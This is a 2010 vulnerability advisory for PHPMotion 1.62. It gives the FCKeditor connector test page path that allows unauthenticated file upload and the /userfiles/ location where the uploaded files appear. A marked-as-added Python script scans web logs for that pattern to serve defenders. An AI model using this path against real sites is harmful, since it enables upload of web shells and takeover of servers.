# Title : PHPMotion FCKeditor File Upload Vulnerability
# Published : 2010-11-23
# Author : trycyber


-----------------------------------------------------------------------
PHPMotion/FCKeditor file upload vulnerabilities
-----------------------------------------------------------------------
Author		: trycyber (trycyber@magelangcyber.com)
Homepage	: http://indonesiancoder.com,magelangcyber.web.id
Vendor		: http://www.phpmotion.com/
Dork		: CIHUY ;p
Version     	: 1.62
Tested on	: Windows XP SP2
Date		: November 23, 2010
-----------------------------------------------------------------------

I.  POC & Exploit
-----------------------------------------------------------------------
Default 	:	http://127.0.0.1/


exploit 	:	http://127.0.0.1/phpmotion/fckeditor/editor/filemanager/connectors/test.html
			

results in	:	http://127.0.0.1/userfiles/name of file	 
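
Added example (not part of the original advisory): a log check a defender could run for the two paths above, flagging requests under the FCKeditor connectors directory and script files served from /userfiles/. The log lines are constructed; the connector backend file name, the extension list and the finding names are assumptions.

```python
import re

# Constructed access-log lines (Apache combined format, documentation IPs).
# The "php/connector.php" backend path is an assumption for illustration.
SAMPLE_LOG = """\
203.0.113.7 - - [23/Nov/2010:10:00:01 +0000] "GET /phpmotion/fckeditor/editor/filemanager/connectors/test.html HTTP/1.1" 200 5120
203.0.113.7 - - [23/Nov/2010:10:00:09 +0000] "POST /phpmotion/fckeditor/editor/filemanager/connectors/php/connector.php HTTP/1.1" 200 310
203.0.113.7 - - [23/Nov/2010:10:00:15 +0000] "GET /userfiles/sample.php HTTP/1.1" 200 42
198.51.100.4 - - [23/Nov/2010:10:01:00 +0000] "GET /userfiles/photo.jpg HTTP/1.1" 200 20480
198.51.100.4 - - [23/Nov/2010:10:02:00 +0000] "GET /index.php HTTP/1.1" 200 9000
"""

LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3})')
# Directory named in the advisory's PoC URL.
CONNECTOR = re.compile(r"/fckeditor/editor/filemanager/connectors/", re.I)
# Assumption: extensions this server could execute. Matched anywhere in the
# file name so a double extension such as "x.php.jpg" is caught too.
SCRIPT = re.compile(r"/userfiles/[^?]*\.(?:php\d?|phtml|asp|aspx|jsp|cgi)\b", re.I)


def find_suspicious(lines):
    """Return (client, finding, path) tuples for requests matching the advisory."""
    findings, uploaders = [], set()
    for raw in lines:
        m = LINE.match(raw)
        if not m:
            continue  # skip malformed lines
        client, method, path, status = m.groups()
        ok = status.startswith("2")
        if CONNECTOR.search(path):
            if method == "POST" and ok:
                uploaders.add(client)
                findings.append((client, "connector-upload", path))
            else:
                findings.append((client, "connector-access", path))
        elif SCRIPT.search(path):
            # A 2xx means the file exists; it is worse when the same client
            # posted to the connector earlier in the log.
            kind = "script-served" if ok else "script-probe"
            if ok and client in uploaders:
                kind = "upload-then-execute"
            findings.append((client, kind, path))
    return findings


if __name__ == "__main__":
    for finding in find_suspicious(SAMPLE_LOG.splitlines()):
        print(*finding, sep="\t")
```

Any "connector-access" hit on a production host also means the connectors directory, including test.html, is still deployed and reachable.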


------------------------------------------------------------------------
Credits
------------------------------------------------------------------------
Allahu Akbar
INDONESIAN CODER ~ Magelangcyber-team ~ Kill-9 Crew ~ MC Crew
Don Tukulesto ~ kaMtiEz ~ ibl13z ~ Jundab ~ N4ck0 ~ Yurakha ~ aN93l1c ~  Mboys ~ Contrex ~  n4KuLa_
k4L0ng666 ~ Xr0b0t ~ Adipati ~ Arianom ~ t3ll0 ~ cimpli ~ Pathloader

-------------------------------------------------------------------------
"I learn not because of you, but because I want to become myself"

Indonesiancoder family & Magelangcyber family